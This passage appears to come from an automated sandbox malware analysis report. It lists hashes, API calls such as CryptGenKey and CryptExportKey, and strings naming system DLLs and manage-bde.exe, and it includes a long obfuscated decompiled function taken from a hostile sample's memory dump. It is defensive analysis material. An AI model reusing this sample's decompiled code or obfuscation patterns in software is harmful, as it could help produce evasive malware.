Instruction ID: e9c48517b0ac84f957060bcc7aeeb06e856d6f36caa06973e3d356a712702490
Opcode Fuzzy Hash: 848c5e8f9a05c015a8dfad3e0ea19ad11912fbad5b5f9291dbf41e5b8019e3de
Instruction Fuzzy Hash: 7AA012CCD1004000EA0410315806027101261E060FBD5C4F9640040524FB3CC008204D

Uniqueness

Uniqueness Score: -1.00%

Function 0049CE7B Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 0049CE7E

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0812895e45617c5c4e4a7d7a4b2ce7937544b91015d94f98938b2dcb8d24b70a
Instruction ID: 8f5e82654a294b885a464b20ee541d000788733ec0358df1be5687d2464c533c
Opcode Fuzzy Hash: 0812895e45617c5c4e4a7d7a4b2ce7937544b91015d94f98938b2dcb8d24b70a
Instruction Fuzzy Hash: 179002755001176AC500FB10B44965A659257B328E30042319552A005485B5D121C658

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004AD36A Relevance: 30.1, APIs: 2, Strings: 15, Instructions: 361encryptionCOMMON

Download Yara Rule

APIs

CryptGenKey.ADVAPI32(?), ref: 004AD3BC
CryptExportKey.ADVAPI32(?,28368DE9,00000007,00000000,00000000,?), ref: 004AD857

Strings

sqlsrv32.dll, xrefs: 004AD677
manage-bde.exe, xrefs: 004AD77E
KBDBGPH.DLL, xrefs: 004AD41E
deskperf.dll, xrefs: 004AD5D7
n*, xrefs: 004AD503
scavengeui.dll, xrefs: 004AEC8B, 004AEC8C
msobjs.dll, xrefs: 004AD4A1
rdpwsx.dll, xrefs: 004AD635
F$, xrefs: 004AD5E1
mssip32.dll, xrefs: 004AD4E7, 004AD5BF
UA6, xrefs: 004AD499
speechuxcpl.dll, xrefs: 004AD412
MXEAgent.dll, xrefs: 004AD7BA
sspicli.dll, xrefs: 004AD872
3M%, xrefs: 004AD43B

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: Crypt$Export
String ID: 3M%$KBDBGPH.DLL$MXEAgent.dll$UA6$deskperf.dll$manage-bde.exe$msobjs.dll$mssip32.dll$n*$rdpwsx.dll$scavengeui.dll$speechuxcpl.dll$sqlsrv32.dll$sspicli.dll$F$
API String ID: 2274563390-839260029
Opcode ID: f059c8dd699c62ea10cb8dff2d9c52112d7222b7e77b7ff825f319522e3e6ef9
Instruction ID: eb89f8d24d741d3d41c5b3d1f7c4e12171d3be051a21968316c67e2be3e7a217
Opcode Fuzzy Hash: f059c8dd699c62ea10cb8dff2d9c52112d7222b7e77b7ff825f319522e3e6ef9
Instruction Fuzzy Hash: 6DD1EE65E442459FCB00EFB9E8946ED7BB1EB3A310B44807BC94597722E3780A58CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 004E55F9 Relevance: 20.7, Strings: 16, Instructions: 718
COMMONCrypto

Download Yara Rule

C-Code - Quality: 51%

			E004E55F9(void* __ebx, void* __edx, signed int __edi, signed int __esi) {
				signed int _t106;
				signed int _t108;
				signed int _t112;
				signed int _t117;
				void* _t119;
				void* _t120;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				char* _t139;
				void* _t140;
				signed int _t141;
				void* _t142;
				void* _t151;
				signed int _t152;
				signed int _t153;
				void* _t154;
				signed int _t155;
				signed int _t156;
				signed int _t158;
				void* _t160;
				signed int _t161;
				signed int _t162;
				signed int _t213;
				char* _t224;
				void* _t246;
				void* _t255;
				intOrPtr _t282;
				char* _t298;
				signed int _t301;
				signed char _t317;
				short _t319;
				signed char _t323;
				void* _t324;
				signed int _t331;
				unsigned short _t332;
				signed int _t343;
				signed int _t344;
				signed int _t347;
				signed int _t350;
				signed int _t353;
				intOrPtr _t363;
				signed int _t371;
				signed char _t372;
				signed int _t373;
				signed int _t380;
				void* _t384;
				signed int _t387;
				void* _t389;
				void* _t391;
				signed int _t398;
				unsigned short _t401;
				intOrPtr _t404;
				signed int _t405;
				signed int _t407;
				intOrPtr _t415;
				signed int _t423;
				signed int _t429;
				void* _t430;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				void* _t435;
				void* _t436;
				void* _t441;
				signed int _t444;
				signed int _t445;
				signed int _t449;
				signed int _t454;
				signed int _t460;
				signed int _t462;
				signed int _t464;
				void* _t465;
				void* _t466;
				void* _t467;
				signed short _t469;
				signed short _t471;
				void* _t476;
				signed int _t495;

				_t449 = __esi;
				_t423 = __edi;
				 *(_t476 - 0xc) =  *(_t476 - 8);
				 *(_t476 - 8) =  *(_t476 - 0xc);
				_t106 =  *(_t476 - 8);
				 *(_t476 - 0x50) = _t106;
				 *0x4fff1e = _t106;
				if(_t106 > 0x11) {
					L3:
					_t449 = 0xbfec8e;
					 *0x4fff1e = _t106;
					_t423 = 0;
					if(_t106 >= 0x14) {
						_t317 =  *0x4fd13a; // 0x67ef
						goto L5;
					}
				} else {
					 *0x4fdaaf = _t106;
					if("mssip32.dll" - 0x40a3e6 != "mssip32.dll" - 0x40a3e6) {
						L5:
						_t317 = _t317 - 0x72a1;
						 *0x4fd18a = _t317;
					} else {
						_t363 =  *0x4fd164; // 0x3c87
						_t317 = _t363 + 1;
						goto L3;
					}
				}
				_t371 =  *0x4fd1be; // 0x9964
				_push( *((intOrPtr*)(_t476 - 0x30)));
				 *0x4fff1b = _t106;
				 *0x4fff1e =  *0x4fff1e + _t106;
				 *(_t476 - 0x10) = _t106;
				 *0x4fff1d = _t106;
				_t108 =  *0x4fff1e; // 0x3
				_t429 =  !((_t423 + 0xda2c >> _t317) - 0xd76fca);
				 *0x4fd4d3 =  *0x4fd4d3 + _t108;
				 *0x4fd13c = _t317;
				 *(_t476 - 8) =  *(_t476 - 0x10);
				 *0x4fd158 = 0;
				_t319 =  *0x4fd1a2; // 0x5e
				_t112 =  *(_t476 - 8);
				 *0x4fd7e3 =  *0x4fd7e3 - _t112;
				 *0x4fff11 =  *0x4fff11 + _t112;
				_push( *(_t476 - 0x50));
				 *0x4fff18 =  *0x4fff18 + _t371;
				_t372 = _t371 ^ _t449;
				 *(_t476 - 8) = _t112;
				if(_t319 < _t319) {
					 *0x4fd35f = _t112;
					_t112 = _t112 + _t112;
					if(_t112 >= 0x22) {
					}
				}
				 *0x4fd136 = _t319;
				 *0x4fe7c7 =  *0x4fe7c7 + _t372;
				if((_t372 & 0x0000009b) > 0) {
					_t372 = _t372 + 0x96c76d;
					 *0x4feec3 =  *0x4feec3 - _t449;
					 *0x4fff1b = _t112;
				}
				_t430 = _t429 - 0xdf4e;
				_t323 = 0x740f;
				_push( *((intOrPtr*)(_t476 + 0xc)));
				 *0x4fd1f6 = _t372;
				_t373 =  *0x4fd22a; // 0x6ff8
				_push( *(_t476 - 8));
				_pop(_t117);
				if((_t373 & 0x0000008f) < 0) {
					L17:
					_t323 = 0x66c2;
					 *(_t476 - 8) =  *(_t476 - 8) - 0x66c2;
					_t373 = 0x9611;
					 *0x4fff18 =  *0x4fff18 - 0x9611;
					_t495 =  *0x4fff18;
				} else {
					if((_t373 & 0x009addf2) >= 0) {
						if(_t449 >= 0) {
							 *0x4fff1e = _t117;
						}
						goto L17;
					}
				}
				_t119 = E004A318B(_t323, _t373, _t430, 0, _t495);
				_t454 = 0xa3edf9 >> _t323;
				 *0x4fd21e = _t454;
				_t120 = _t119;
				_push(_t120);
				_t431 = _t430 + 0xcbc732;
				 *(_t476 - 0xc) =  *(_t476 + 8);
				_t123 =  *(_t476 - 0xc);
				if( *_t123 != 0x5a4d) {
					__eflags = _t123;
					if(_t123 <= 0) {
						 *0x4fff1e = _t123;
					}
					_t324 = 0x72a6;
					_push(_t373);
					_t124 = _t123;
					 *0x4fff19 = _t124;
					__eflags = _t454 & 0x00a62fb1;
					if((_t454 & 0x00a62fb1) < 0) {
						 *0x4ffa28 =  *0x4ffa28 + _t454 - 0xc910;
						 *0x4fff1d = _t124;
						_t301 =  *0x4fff1e; // 0x3
						 *0x4fd3b7 =  *0x4fd3b7 - _t124;
						__eflags = _t301 + _t124 + _t124;
					}
					_t125 = _t124;
					 *0x4fff1d = _t125;
					_push(_t125);
					__eflags = _t431;
					if(_t431 > 0) {
					}
					_pop(_t126);
					 *0x4fd1d4 = 0x13bb6;
					_t195 = 0xb4;
					 *(_t476 - 8) = _t126;
					_pop(_t380);
					_t127 =  *(_t476 - 8);
					__eflags =  *(_t476 + 8);
					if( *(_t476 + 8) == 0) {
						L28:
						_push(_t380);
						__eflags = _t380 & 0x00009324;
						if((_t380 & 0x00009324) > 0) {
							 *0x4fff19 = _t127;
							_t195 = _t127 - 0xd6;
							__eflags = _t195;
						}
						 *(_t476 - 8) = _t127;
						_push(_t195);
						_push(1);
						_push(1);
						_push(0x4e62ed);
						_push(E0049DAF1);
						return _t127;
					} else {
						_t195 = 0xb4 - _t127 - 0xc2;
						 *(_t476 - 8) = _t127;
						 *0x4fff19 = _t127;
						_t384 = _t380;
						_t432 =  !_t431;
						_push(_t384);
						_t459 = 0x15f18;
						_push(0);
						_push(0x15f18);
						E0049D511();
						_push(1);
						_push(1);
						L004618BC(6, 0x12004);
						_t380 = _t432;
						_t127 =  *(_t476 - 8);
						__eflags =  *(_t476 - 0x1c);
						if( *(_t476 - 0x1c) != 0) {
							_push(_t380);
							__eflags = _t380 & 0x00987b05;
							if((_t380 & 0x00987b05) > 0) {
								L34:
								__eflags = _t324 - _t324;
								if(_t324 >= _t324) {
									_t324 = 0x83a3;
									 *0x4fe83f =  *0x4fe83f + _t380;
									__eflags =  *0x4fe83f;
									goto L36;
								}
							} else {
								_t459 = 0x218e0;
								 *0x4fff1d = _t127;
								_t432 = _t432 + _t432 + 0xf0f9;
								 *0x4fff1e =  *0x4fff1e - _t127;
								_t298 = "user.exe";
								__eflags = _t298 - 0x366b45;
								if(_t298 < 0x366b45) {
									 *0x4fff15 =  *0x4fff15 + _t324;
									__eflags =  *0x4fff15;
									goto L34;
								}
							}
							 *0x4fd258 =  *0x4fd258 + _t459;
							 *0x4ff68b =  *0x4ff68b + _t459;
							_t460 = _t459 + _t459;
							_pop(_t387);
							_t135 =  *(_t476 - 0x1c);
							_push(_t387);
							 *0x4fd1fa = _t387;
							__eflags = _t387 & 0x009b4aa2;
							if((_t387 & 0x009b4aa2) < 0) {
								L40:
								 *0x4fff11 =  *0x4fff11 + _t135;
								 *(_t476 - 8) =  *(_t476 - 8) + 0x404d25;
								 *0x4fd198 =  *0x4fd198 - 0xffffffffffff90e2;
								__eflags =  *0x4fd198;
								 *0x4fd1b2 = _t387;
							} else {
								__eflags = _t460;
								if(_t460 <= 0) {
									 *0x4fff1b =  *0x4fff1b + _t135;
									__eflags =  *0x4fff1b;
									goto L40;
								}
							}
							_pop(_t389);
							 *(_t476 - 0x84) = _t135;
							_t391 = _t389;
							_push(0x28);
							_push(_t391);
							_t136 = _t135;
							 *0x4fd212 = 0x94e5;
							E0049CD07();
							__eflags = _t460 & 0x009d907c;
							if((_t460 & 0x009d907c) < 0) {
							}
							 *0x4fff1e = _t136;
							_t434 = 0;
							 *0x4fd8b3 = _t136;
							 *(_t476 - 8) =  *(_t476 - 8) - 0x4292fe;
							 *(_t476 - 8) = _t136;
							_t330 = 0x7bc1;
							_t137 =  *(_t476 - 8);
							_t213 = _t137;
							_t398 =  *0x4fd228; // 0x2836
							_t139 = _t137;
							 *(_t476 - 0x88) = _t139;
							 *0x4fff1b = 0xbe;
							_push(_t139);
							 *0x4fff1b = 0xbe;
							__eflags = 0;
							if(0 <= 0) {
								L47:
								 *0x4fff19 =  &(_t139[ *0x4fff19]);
								__eflags = _t460 - 0x39d3;
								if(_t460 < 0x39d3) {
									goto L50;
								} else {
									__eflags = _t213 - 0x49133c;
									goto L49;
								}
							} else {
								_t434 = 0xffffffffff2c4f35;
								 *0x4fd313 =  *0x4fd313 + 0xffffffffff2c4f35;
								_t139 = "CreateActCtxW";
								_t213 = 0x47337d;
								__eflags = 0x47337d - 0x7bc1;
								if(0x47337d != 0x7bc1) {
									L51:
									 *0x4feec3 =  *0x4feec3 - _t460;
									 *0x4fff1b = _t139;
									__eflags = 0;
								} else {
									__eflags = 0x7bc1 - 0x7bc1;
									if(0x7bc1 > 0x7bc1) {
										L49:
										 *0x4fd11e =  *0x4fd11e + _t330;
										__eflags = _t398 & 0x0000008b;
										if((_t398 & 0x0000008b) != 0) {
											L50:
											_t398 = 0x96dc14;
											__eflags = 0x96dc14;
											goto L51;
										}
									} else {
										_t330 = 0x7c3a;
										 *0x4fe653 =  *0x4fe653 - _t398;
										 *0x4fd1ca = _t398;
										_t398 = 0x94fc56;
										__eflags = 0x94fc56;
										goto L47;
									}
								}
							}
							_t435 = _t434 + 0xdf65;
							_pop(_t140);
							_t462 =  *(_t476 - 0x84);
							_t331 =  *0x4fd162; // 0xd112
							_t332 = _t331 | _t398;
							_push(_t462);
							_t464 =  !_t462 +  !_t462;
							_t141 = _t140;
							_t401 =  !(_t398 - 0x91b3);
							__eflags = _t464 & 0x009ef569;
							if((_t464 & 0x009ef569) < 0) {
								__eflags = _t464 - 0xad19ee;
								 *0x4fff1d = _t141;
							}
							 *0x4ffed4 =  *0x4ffed4 - _t435;
							 *0x4fd3b3 =  *0x4fd3b3 + _t141;
							 *0x4fff12 =  *0x4fff12 + _t141;
							_pop(_t465);
							_t436 =  *(_t476 - 0x88);
							__eflags = _t436;
							if(_t436 > 0) {
								L61:
								 *0x4fd1f8 = _t401;
								_t401 = 0;
								 *0x4fff1b = _t141;
								__eflags = _t465;
								if(_t465 > 0) {
									goto L63;
								}
							} else {
								__eflags = _t436;
								if(_t436 <= 0) {
									 *0x4fd02e =  *0x4fd02e + _t141;
									__eflags =  *0x4fd02e;
								}
								__eflags = "CoRevokeInitializeSpy" - 0x45fd;
								if("CoRevokeInitializeSpy" >= 0x45fd) {
									L63:
									 *0x4fff1e = _t141;
									_t282 =  *0x4fd54f; // 0x775f7000
									 *0x4fd064 =  *0x4fd064 - _t141;
									__eflags = _t282 - 0x1547b9 + _t141;
								} else {
									__eflags = _t332 - _t332;
									if(_t332 < _t332) {
										_t64 = _t476 - 8;
										 *_t64 =  *(_t476 - 8) - _t332;
										__eflags =  *_t64;
									}
									_t332 = 0x775779;
									__eflags = 0x775779;
									goto L61;
								}
							}
							__eflags = 0x4fd0ca - 0x4fd0ca;
							if(0x4fd0ca <= 0x4fd0ca) {
								__eflags = _t332 >> _t332;
							}
							_t142 = memcpy(_t436, _t465, 0x28 << 2);
							 *0x4fd6cd =  *0x4fd6cd + _t465;
							_push(_t465 + 0x50);
							 *(_t476 - 8) = 0;
							 *(_t476 - 0xc) = _t142;
							 *0x4fd2e1 =  *0x4fd2e1 - _t465;
							 *0x4fd2fd =  *0x4fd2fd + _t465;
							E004C417A(_t142 + _t142, _t401 >> 0x7e39, _t465 + 0xf00d, _t465, 1);
							E004DB1B8();
							_t224 = "scavengeui.dll";
							E004C1BE4("EhStorAuthn.exe", _t224, 0x8267, _t401 >> 0x7e39);
							_t466 = 0x8267;
							_t404 =  *0x4fd1fe; // 0xa5ad
							 *0x4fed73 =  *0x4fed73 - _t404;
							 *0x4fdb0f =  *0x4fdb0f + _t224;
							 *0x4ff643 =  *0x4ff643 + _t466;
							_t467 = _t466;
							_t469 = _t467;
							_t441 = _t465;
							_t343 =  *(_t476 - 8);
							_t151 =  *(_t476 - 0x88);
							_t405 = 0x5c69;
							 *(_t476 - 8) = _t343;
							__eflags = _t343 - _t343;
							if(_t343 > _t343) {
								L70:
								__eflags = _t151 - 0xcb181a;
								 *0x4fff1e = _t151;
							} else {
								__eflags = 0x3c5;
								if(0x3c5 == 0) {
									 *0x4fff18 =  *0x4fff18 + 0x5c69;
									__eflags =  *0x4fff18;
								}
								_t405 = _t405 - 0x99984a;
								__eflags = _t469 & 0x0000bb06;
								if((_t469 & 0x0000bb06) < 0) {
									goto L70;
								}
							}
							_t344 =  *(_t476 - 8);
							_t152 =  *(_t151 + 0x20);
							_push(_t469);
							 *0x4fff1b = _t152;
							_push(_t441);
							 *(_t476 - 8) = _t344;
							__eflags = _t344 - _t344;
							if(_t344 >= _t344) {
								 *0x4fff17 =  *0x4fff17 + _t405;
								_t405 = (_t405 & 0x00000099) + 0x008e4363 | 0x009c67e8;
								 *0x4fee8b =  *0x4fee8b + _t469;
								_t469 = _t469 - 0xb8b0f1;
								 *0x4fff1d =  *0x4fff1d + _t152;
								__eflags =  *0x4fff1d;
							}
							 *0x4fd1c8 = _t405;
							_t153 = _t152;
							 *0x4fff1b = _t153;
							_t407 = _t405 + 0x0000a518 & 0x0000a834;
							_t154 = _t153;
							_pop(_t444);
							_pop(_t471);
							_t155 = _t154 +  *(_t476 + 8);
							_t347 =  *(_t476 - 8);
							 *(_t476 - 0x20) = _t155;
							_push(_t444);
							__eflags = _t155;
							if(_t155 > 0) {
								L76:
								_t407 =  *0x4fd19a; // 0x8f85
								 *0x4fff17 =  *0x4fff17 - _t407;
								 *0x4fd1e8 =  *0x4fd1e8 + _t407;
								__eflags = _t407 & 0x000000a2;
								if((_t407 & 0x000000a2) >= 0) {
									_t444 = _t444 | 0x00ab8f8f;
									__eflags = _t444;
									goto L78;
								}
							} else {
								 *0x4fd020 =  *0x4fd020 - _t155;
								_t274 = 2 - _t155 + 0x2199;
								__eflags = 2 - _t155 + 0x2199 - _t274;
								if(2 - _t155 + 0x2199 != _t274) {
									L78:
									__eflags = _t444 + _t471;
								} else {
									__eflags = 0;
									 *0x4fd14e = _t347;
									goto L76;
								}
							}
							 *0x4fff1e = _t155;
							_pop(_t445);
							_t156 =  *(_t476 - 0x88);
							__eflags = _t471 & 0x0000b97e;
							if((_t471 & 0x0000b97e) != 0) {
								L81:
								 *0x4fd3bf = _t156;
							} else {
								 *0x4fff1b = _t156;
								__eflags = _t156;
								if(_t156 == 0) {
									goto L81;
								}
							}
							 *0x4fd08e =  *0x4fd08e + "msmpeg2adec.dll";
							 *0x4fff15 =  *0x4fff15 + _t347;
							 *0x4fd1c0 = (_t407 & 0x0000006d) + 0x6ebad8;
							 *0x4fff19 = _t156;
							_t246 = 0xb6 - _t471;
							__eflags = _t471;
							if(_t471 > 0) {
								__eflags = _t246 + 0xde;
							}
							 *0x4ffb7c =  *0x4ffb7c - _t445;
							 *0x4fd7f3 = _t156;
							 *(_t476 - 8) = _t347;
							 *0x4fd146 = _t347;
							_t350 =  *(_t476 - 8);
							_t158 =  *((intOrPtr*)(_t156 + 0x1c)) +  *(_t476 + 8);
							 *((intOrPtr*)(_t476 - 0x24)) = _t158;
							_push(_t471);
							_push(_t445);
							_t255 = 0xffffffffffffffe0;
							 *0x4fd3ab = _t158;
							__eflags = _t158 - 0x1464;
							if(_t158 != 0x1464) {
								 *0x4fdb33 = "msmpeg2adec.dll";
								_t255 = 0x4adc65;
							}
							 *(_t476 - 8) =  *(_t476 - 8) - _t350;
							 *(_t476 - 8) = _t350;
							_push(_t158);
							__eflags = _t445;
							if(_t445 >= 0) {
								__eflags = _t158;
								if(_t158 < 0) {
									 *0x4fd51b =  *0x4fd51b + _t158;
									__eflags =  *0x4fd51b;
								}
								 *0x4fff12 =  *0x4fff12 - _t255;
								__eflags =  *0x4fff12;
							}
							 *0x4fd15c = 0x5d52;
							 *0x4fd178 = 0x5d52;
							_pop(_t446);
							_pop(_t473);
							_t353 =  *(_t476 - 8);
							_t160 =  *(_t476 - 0x88);
							__eflags = 0;
							if(0 == 0) {
								_t415 =  *0x4fd12e; // 0x79e0
								 *0x4fd17e = _t353;
								__eflags = _t415 + _t415 + 0x99;
							}
							_t161 =  *(_t160 + 0x14);
							 *0x4fd1ee =  *0x4fd1ee + 0x91da;
							 *(_t476 - 8) = _t353;
							 *0x4fd1a2 =  *0x4fd1a2 + 0x91da;
							_push(_t161);
							 *0x4fff1d = _t161;
							_t162 = _t161 + _t161;
							__eflags = _t162;
							_push(1);
							_push(_t446);
							_push(0x4e699a);
							_push(L0045F957);
							return _t162;
						} else {
							goto L28;
						}
					}
				} else {
					 *(_t476 - 8) = _t123;
					_push(1);
					_push(1);
					_push(_t323);
					_push(E004E5869);
					_push(E004DA9C9);
					return _t123;
				}
			}

0x004e55f9
0x004e55f9
0x004e5601
0x004e5611
0x004e561d
0x004e5620
0x004e5623
0x004e562a
0x004e5651
0x004e566b
0x004e5680
0x004e5685
0x004e5692
0x004e56a2
0x00000000
0x004e56a2
0x004e562c
0x004e5631
0x004e5641
0x004e56a9
0x004e56a9
0x004e56ae
0x004e5646
0x004e5646
0x004e564d
0x00000000
0x004e564e
0x004e5641
0x004e56b5
0x004e56bc
0x004e56bf
0x004e56cc
0x004e56d7
0x004e56da
0x004e56e1
0x004e56ed
0x004e56ef
0x004e5708
0x004e5711
0x004e5714
0x004e571e
0x004e5725
0x004e572b
0x004e5731
0x004e5740
0x004e5743
0x004e5749
0x004e574b
0x004e5750
0x004e5752
0x004e5757
0x004e575b
0x004e575b
0x004e5765
0x004e5770
0x004e577c
0x004e5785
0x004e5787
0x004e578d
0x004e5793
0x004e5793
0x004e579f
0x004e57ae
0x004e57b5
0x004e57b8
0x004e57bf
0x004e57c8
0x004e57d0
0x004e57d4
0x004e5800
0x004e5802
0x004e5806
0x004e580e
0x004e5812
0x004e5812
0x004e57d6
0x004e57dc
0x004e57e2
0x004e57e7
0x004e57f9
0x00000000
0x004e57fb
0x004e57dc
0x004e5826
0x004e5827
0x004e582b
0x004e5834
0x004e5837
0x004e5838
0x004e5842
0x004e5848
0x004e5850
0x004e61ac
0x004e61ae
0x004e61b0
0x004e61b0
0x004e61d0
0x004e61d4
0x004e61e2
0x004e61e3
0x004e61e9
0x004e61ef
0x004e61f6
0x004e61fc
0x004e6203
0x004e6209
0x004e6211
0x004e6211
0x004e621d
0x004e621e
0x004e6229
0x004e622a
0x004e622c
0x004e622c
0x004e6230
0x004e6231
0x004e6242
0x004e6244
0x004e624c
0x004e624d
0x004e6250
0x004e6254
0x004e62b7
0x004e62c1
0x004e62c2
0x004e62c7
0x004e62cf
0x004e62d7
0x004e62d7
0x004e62d7
0x004e62da
0x004e62dd
0x004e62de
0x004e62e0
0x004e62e2
0x004e62e7
0x004e62ec
0x004e6256
0x004e625f
0x004e6262
0x004e626f
0x004e627b
0x004e627c
0x004e6288
0x004e6294
0x004e6296
0x004e6298
0x004e6299
0x004e629e
0x004e62a0
0x004e62a3
0x004e62a8
0x004e62ae
0x004e62b1
0x004e62b5
0x004e630e
0x004e630f
0x004e6315
0x004e6357
0x004e6357
0x004e6359
0x004e635b
0x004e635f
0x004e635f
0x00000000
0x004e635f
0x004e6317
0x004e6317
0x004e631c
0x004e6326
0x004e632b
0x004e633c
0x004e6341
0x004e6347
0x004e6351
0x004e6351
0x00000000
0x004e6351
0x004e6347
0x004e6371
0x004e6378
0x004e637e
0x004e6381
0x004e6382
0x004e6385
0x004e6386
0x004e638d
0x004e6393
0x004e63a8
0x004e63b6
0x004e63ca
0x004e63d4
0x004e63d4
0x004e63db
0x004e6395
0x004e6395
0x004e6398
0x004e639a
0x004e639a
0x00000000
0x004e63a2
0x004e6398
0x004e63e6
0x004e63e7
0x004e63f0
0x004e63f1
0x004e63fa
0x004e6402
0x004e6403
0x004e640b
0x004e6415
0x004e641b
0x004e641b
0x004e6425
0x004e642a
0x004e6432
0x004e6445
0x004e644b
0x004e6451
0x004e6455
0x004e645d
0x004e6466
0x004e646f
0x004e6470
0x004e6476
0x004e647c
0x004e647d
0x004e6483
0x004e6485
0x004e64c9
0x004e64c9
0x004e64cf
0x004e64d4
0x00000000
0x004e64d6
0x004e64d6
0x00000000
0x004e64d6
0x004e6487
0x004e6487
0x004e648d
0x004e649a
0x004e64a2
0x004e64a7
0x004e64a9
0x004e64fc
0x004e64fc
0x004e6502
0x004e6508
0x004e64ab
0x004e64ab
0x004e64ae
0x004e64dc
0x004e64dc
0x004e64ef
0x004e64f2
0x004e64f4
0x004e64f6
0x004e64f6
0x00000000
0x004e64f6
0x004e64b0
0x004e64b0
0x004e64b3
0x004e64b9
0x004e64c3
0x004e64c3
0x00000000
0x004e64c3
0x004e64ae
0x004e64a9
0x004e650b
0x004e6510
0x004e6511
0x004e6517
0x004e651e
0x004e6520
0x004e6523
0x004e652c
0x004e652d
0x004e652f
0x004e6535
0x004e6537
0x004e653d
0x004e6543
0x004e654b
0x004e6551
0x004e6560
0x004e6566
0x004e6567
0x004e656f
0x004e6572
0x004e65a4
0x004e65a4
0x004e65ab
0x004e65b4
0x004e65ba
0x004e65bd
0x00000000
0x004e65c5
0x004e6574
0x004e6574
0x004e6576
0x004e6578
0x004e6578
0x004e6578
0x004e658b
0x004e6590
0x004e65c7
0x004e65c7
0x004e65ce
0x004e65da
0x004e65e1
0x004e6592
0x004e6595
0x004e6597
0x004e6599
0x004e6599
0x004e6599
0x004e6599
0x004e659e
0x004e659e
0x00000000
0x004e659e
0x004e6590
0x004e65e9
0x004e65ec
0x004e65ee
0x004e65ee
0x004e660b
0x004e660d
0x004e6614
0x004e661a
0x004e662c
0x004e662f
0x004e6636
0x004e6641
0x004e6646
0x004e6664
0x004e666a
0x004e667a
0x004e6680
0x004e6687
0x004e668d
0x004e6698
0x004e669e
0x004e66a5
0x004e66a6
0x004e66aa
0x004e66ad
0x004e66b3
0x004e66b7
0x004e66ba
0x004e66bc
0x004e66db
0x004e66e0
0x004e66e6
0x004e66be
0x004e66be
0x004e66c3
0x004e66c5
0x004e66c5
0x004e66c5
0x004e66ce
0x004e66d4
0x004e66d9
0x00000000
0x00000000
0x004e66d9
0x004e66f3
0x004e66f6
0x004e66f9
0x004e66fd
0x004e6703
0x004e670c
0x004e670f
0x004e6711
0x004e6719
0x004e672b
0x004e6731
0x004e6739
0x004e6741
0x004e6741
0x004e6741
0x004e6748
0x004e674f
0x004e6757
0x004e675e
0x004e676a
0x004e676b
0x004e676c
0x004e6770
0x004e677b
0x004e677e
0x004e678b
0x004e678c
0x004e678e
0x004e67b8
0x004e67b8
0x004e67bf
0x004e67c5
0x004e67cc
0x004e67cf
0x004e67d7
0x004e67d7
0x00000000
0x004e67d7
0x004e6790
0x004e6792
0x004e67a0
0x004e67a2
0x004e67a4
0x004e67dd
0x004e67dd
0x004e67a6
0x004e67a6
0x004e67ae
0x00000000
0x004e67b5
0x004e67a4
0x004e67eb
0x004e67fa
0x004e67fb
0x004e6801
0x004e6806
0x004e6817
0x004e6817
0x004e6808
0x004e6808
0x004e6813
0x004e6815
0x00000000
0x00000000
0x004e6815
0x004e6827
0x004e6839
0x004e6848
0x004e6857
0x004e685d
0x004e685f
0x004e6861
0x004e6863
0x004e6863
0x004e6866
0x004e687b
0x004e6888
0x004e688b
0x004e689a
0x004e689d
0x004e68a8
0x004e68ab
0x004e68b1
0x004e68b2
0x004e68b5
0x004e68ba
0x004e68be
0x004e68c5
0x004e68ce
0x004e68ce
0x004e68d3
0x004e68d6
0x004e68de
0x004e68df
0x004e68e2
0x004e68e4
0x004e68e6
0x004e68e8
0x004e68e8
0x004e68e8
0x004e68f5
0x004e68f5
0x004e68f5
0x004e6904
0x004e690b
0x004e6916
0x004e6917
0x004e6918
0x004e691b
0x004e6921
0x004e6923
0x004e6925
0x004e692c
0x004e6935
0x004e6935
0x004e694a
0x004e695b
0x004e6968
0x004e697a
0x004e6984
0x004e6985
0x004e698a
0x004e698a
0x004e698c
0x004e698e
0x004e698f
0x004e6994
0x004e6999
0x00000000
0x00000000
0x00000000
0x004e62b5
0x004e5856
0x004e5856
0x004e5859
0x004e585b
0x004e585d
0x004e585e
0x004e5863
0x004e5868
0x004e5868

Strings

psapi.dll, xrefs: 004E61BB
api-ms-win-core-libraryloader-l1-1-0.dll, xrefs: 004E57F2
_|", xrefs: 004E6581
scavengeui.dll, xrefs: 004E6664
Microsoft.Build.Engine.dll, xrefs: 004E6458
EhStorAuthn.exe, xrefs: 004E6655
o]C, xrefs: 004E6792
mssip32.dll, xrefs: 004E562C
CreateActCtxW, xrefs: 004E649A
PortableDeviceWMDRM.dll, xrefs: 004E576B
msmpeg2adec.dll, xrefs: 004E6822, 004E68C0
0oy, xrefs: 004E688B
Ek6, xrefs: 004E6341
CoRevokeInitializeSpy, xrefs: 004E6586
user.exe, xrefs: 004E633C
yv, xrefs: 004E6925

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID: 0oy$CoRevokeInitializeSpy$CreateActCtxW$EhStorAuthn.exe$Ek6$Microsoft.Build.Engine.dll$PortableDeviceWMDRM.dll$_|"$api-ms-win-core-libraryloader-l1-1-0.dll$msmpeg2adec.dll$mssip32.dll$o]C$psapi.dll$scavengeui.dll$user.exe$yv
API String ID: 0-865815351
Opcode ID: 98b46a57e315fdad52b7e2f419b36efbd082bb9f056bdbdf8b73033d80f57fae
Instruction ID: 1129963a74d5d7b072d787864e2bb6e9efae876c84d95faaa91df07c8c17fe06
Opcode Fuzzy Hash: 98b46a57e315fdad52b7e2f419b36efbd082bb9f056bdbdf8b73033d80f57fae
